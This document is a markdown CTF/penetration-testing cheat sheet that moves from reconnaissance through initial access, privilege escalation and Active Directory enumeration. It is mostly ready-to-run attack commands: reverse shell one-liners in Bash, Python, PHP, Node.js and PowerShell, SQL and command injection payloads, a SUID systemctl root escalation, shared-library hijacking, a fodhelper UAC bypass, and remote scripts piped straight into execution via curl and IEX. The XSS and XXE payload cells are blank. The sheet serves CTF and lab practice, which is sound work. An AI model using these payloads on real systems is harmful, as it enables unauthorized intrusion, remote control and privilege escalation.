# CTF_CheatSheet ## **Stage 1 – Lay of the Land (Enumeration)** ### Active Reconnaissance | Tool | Purpose | Key Command | |------|---------|------------| | **Nmap** | Port scanning & service detection | `nmap -sV -sC -oA nmap/basic [IP]` | | **Masscan** | Ultra-fast port scanning | `masscan [IP] -p 1-65535 --rate 10000 -oX masscan.xml` | | **Netdiscover** | ARP discovery on local network | `netdiscover -i [INTERFACE]` | | **RPC Client** | Enumerate RPC services & null sessions | `rpcclient -U "" [IP]` | | **Enum4Linux** | SMB/LDAP/RPC enumeration | `enum4linux [IP]` | ### Passive Reconnaissance | Tool | Purpose | |------|---------| | **Shodan** | Internet-wide device search | | **Wayback Machine** | Historical website snapshots | | **The Harvester** | Email and subdomain enumeration | | **DNS Recon** | DNS enumeration and zone transfers | ### Directory & File Enumeration | Tool | Command | |------|---------| | **Gobuster (HTTP)** | `gobuster dir -u http://[URL] -w [wordlist] -t 10 -r` | | **Gobuster (DNS)** | `gobuster dns -d [domain] -w [wordlist]` | | **Dirb** | `dirb http://[URL] /path/to/wordlist` | | **FFuF** | `ffuf -u http://[URL]/FUZZ -w [wordlist] -mc 200,204,301,302,307,401,403` | --- ## **Nmap Deep Dive** ```bash # Basic comprehensive scan nmap -sV -sC -oA nmap/basic [IP] # All ports with version detection nmap -p- -sV -oA nmap/full [IP] # Aggressive scan with OS detection nmap -A -T4 [IP] # UDP scan nmap -sU -p 53,161,162,445,500 [IP] # Stealth scan (SYN) nmap -sS -p- [IP] # Script scan (NSE) nmap --script vuln [IP] # Service version enumeration nmap -sV --script smb-enum-shares -p 445 [IP] ``` ### Nmap Command Reference **HOST DISCOVERY:** - `-sL` – List Scan - `-sn` – Ping Scan (no port scan) - `-Pn` – Skip host discovery, treat all as online **SCAN TECHNIQUES:** - `-sS` – TCP SYN (stealthy) - `-sT` – TCP Connect - `-sU` – UDP Scan - `-sA` – ACK Scan - `-sN/-sF/-sX` – NULL/FIN/Xmas Scans **PORT SPECIFICATION:** - `-p 22,80,443` – Specific ports - `-p 1-65535` – All ports - `-p U:53,T:80` – Mixed UDP/TCP **OUTPUT:** - `-oN` – Normal - `-oX` – XML - `-oG` – Grepable - `-oA` – All formats --- ## **Masscan Reference** ```bash # Fast scan all ports masscan [IP/CIDR] -p 1-65535 --rate 10000 -oX output.xml # Grab banners masscan [IP/CIDR] -p 80,443,8080 --banners -oX output.xml # Read and convert binary results masscan --open --banners --readscan input.bin -oX output.xml ``` --- ## **Stage 2 – Initial Access (Foothold)** ### Web Exploitation #### Common Web Vulns to Exploit | Vulnerability | Description | Exploitation | |---|---|---| | **SQL Injection** | Database query manipulation | `' OR '1'='1'; --` | | **XSS** | JavaScript injection in DOM | `` | | **CSRF** | Cross-Site Request Forgery | Forge requests with valid session tokens | | **Path Traversal** | Access files outside intended dir | `../../../etc/passwd` | | **XXE** | XML External Entity injection | `]>` | | **SSRF** | Server-Side Request Forgery | `http://localhost:8080/admin` | | **Command Injection** | OS command execution | `; cat /etc/passwd` | | **LFI/RFI** | Local/Remote File Inclusion | `?file=../../../../etc/passwd` | #### SQLMap ```bash # Basic SQL injection test sqlmap -u "http://[URL]?id=1" --dbs # Dump all databases sqlmap -u "http://[URL]?id=1" --dump-all # OS shell sqlmap -u "http://[URL]?id=1" --os-shell # POST request sqlmap -u "http://[URL]" --data="user=admin&pass=test" -p user --dbs ``` #### Burp Suite Workflow 1. **Capture traffic** in Proxy 2. **Send to Repeater** for manual testing 3. **Send to Intruder** for fuzzing/brute force 4. **Scanner** for automated vulnerability detection 5. **Decoder** for encoding/decoding payloads #### Web Shell Uploads ```bash # Test file upload with shell # Common shell names: shell.php, index.php, upload.php # Check upload bypass techniques: # - shell.php.jpg # - shell.jpg.php # - shell.php%00.jpg # - shell.phtml # - shell.shtml # - shell.phar ``` ### Reverse Shells & Initial Access #### Listener Setup ```bash # Netcat listener nc -lvnp [PORT] # Multi-handler (Metasploit) msfconsole > use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST [YOUR_IP] > set LPORT [PORT] > run ``` #### Reverse Shell Payloads | Language | Command | |----------|---------| | **Bash** | `bash -i >& /dev/tcp/[IP]/[PORT] 0>&1` | | **Python** | `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'` | | **PHP** | `php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'` | | **Node.js** | `require('child_process').exec("bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1'");` | | **PowerShell** | `powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IP]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` | | **Java** | See payload generators at http://www.jackson-t.ca/runtime-exec-payloads.html | #### PentestMonkey PHP Reverse Shell php-reverse-shell - A Reverse Shell implementation in PHP **PentestMonkey PHP Reverse Shell:** A Reverse Shell implementation in PHP - Check https://github.com/pentestmonkey/php-reverse-shell #### Upgrade Shell to TTY (Linux) ```bash # Check if TTY tty # Upgrade with Python python3 -c "import pty;pty.spawn('/bin/bash')" # Full interactive terminal stty raw -echo; fg export TERM=xterm ``` #### Windows Reverse Shell (PowerShell) ```powershell # Powershell reverse shell $client = New-Object System.Net.Sockets.TCPClient("[IP]",[PORT]) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i) $sendback = (iex $data 2>&1 | Out-String) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() # One-liner powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[IP]',[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` --- ## **Stage 3 – Privilege Escalation** ### Linux Privilege Escalation #### Quick Enumeration ```bash # Check current user and groups id whoami groups # Kernel version uname -a cat /etc/os-release # Check SUID binaries find / -user root -perm -4000 2>/dev/null # Check for writable directories find / -type d -writable 2>/dev/null # Check sudo permissions sudo -l # Check cron jobs crontab -l cat /etc/cron* -l # Check installed applications apt list --installed pip list npm list -g ``` #### SUID Exploitation **Find SUID binaries:** ```bash find / -user root -perm -4000 2>/dev/null ``` **Exploit with GTFOBins:** Check https://gtfobins.github.io/ for SUID/sudo escapes **Common SUID Exploits:** ```bash # systemctl privilege escalation cd /tmp TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" [Install] WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF /tmp/bash -p # Find library injection opportunities ldd /path/to/suid/binary # Shared library hijacking mkdir -p /tmp/lib echo 'int __libc_start_main() { system("bash"); return 0; }' > /tmp/lib/evil.c gcc -shared -fPIC /tmp/lib/evil.c -o /tmp/lib/evil.so LD_LIBRARY_PATH=/tmp/lib:/usr/lib /path/to/suid/binary ``` #### Capability Escalation ```bash # Check for capabilities getcap -r / 2>/dev/null # Exploit (example: cap_setuid) # Look up on GTFOBins for specific binary ``` #### Sudo Exploitation ```bash # Check sudo permissions sudo -l # If ALL=(ALL) NOPASSWD: /usr/bin/python3 sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')" # Exploiting wildcards in sudo commands # If: sudo /usr/bin/script.sh /tmp/* # Create: /tmp/evil.sh ``` #### Kernel Exploitation ```bash # Find kernel exploits # Use: searchsploit, Exploit-DB # Common kernels: # 4.4.0-21 – CVE-2016-5195 (Dirty COW) # 5.4.0 – overlayfs exploit gcc -o exploit exploit.c ./exploit ``` #### PEASS Enumeration ```bash # Download and run linPEAS curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash # Or: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh ./linpeas.sh ``` --- ### Windows Privilege Escalation #### Quick Enumeration ```powershell # Current user and groups whoami whoami /groups net user %USERNAME% # System info systeminfo Get-ComputerInfo # Check privileges whoami /priv # List installed applications Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName ``` #### Windows Privilege Escalation Vectors | Vector | Check | Exploitation | |--------|-------|--------------| | **Unquoted Service Paths** | `wmic service list brief` | Place exe in path before target | | **Weak Service Permissions** | `accesschk.exe -ucqv [SERVICE]` | Modify service binary or path | | **AlwaysInstallElevated** | Registry check | `msiexec /i shell.msi /qn` | | **Scheduled Tasks** | `schtasks /query /v` | Replace task binary | | **Weak Registry Permissions** | Check ACLs on HKLM | Modify to point to malicious binary | | **Kernel Exploits** | `systeminfo` for OS version | Search Exploit-DB | | **UAC Bypass** | Check UAC status | Use bypassuac tools or exploits | #### WinPEAS ```powershell # Download and run WinPEAS IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1') # Or direct binary .\winPEASx64.exe ``` #### Common Windows Exploits ```powershell # Unquoted service path exploitation # Service: C:\Program Files\App\Service.exe # Create: C:\Program.exe or C:\Program Files\App.exe # AlwaysInstallElevated exploitation msiexec /i malicious.msi /qn /norestart # Scheduled task exploitation (if you can write to task location) schtasks /create /tn evil /tr "C:\path\to\malicious.exe" /sc minute /mo 1 # UAC bypass - fodhelper.exe New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd.exe /c C:\path\to\payload.exe" -Force fodhelper.exe ``` --- ## **Stage 4 – Active Directory (AD)** ### AD Enumeration #### Basic Tools & Commands ```powershell # Get domain info [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() # List domain users Get-ADUser -Filter * | Select Name, SamAccountName # List domain groups Get-ADGroup -Filter * | Select Name # List group members Get-ADGroupMember "Domain Admins" # Check current user's groups whoami /groups # Find trusts Get-ADTrust -Filter * ``` #### PowerView (AD Recon Toolkit) ```powershell # Download PowerView IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') # Get domain info Get-NetDomain Get-NetForest # Enumerate users Get-NetUser | Select name, lastlogon, pwdlastset Get-NetUser -UACFilter DONT_EXPIRE_PASSWORD # Find interesting shares Invoke-ShareFinder # Get group membership Get-NetGroup "Domain Admins" | Get-NetGroupMember # Find admin users Get-NetUser -Admin ```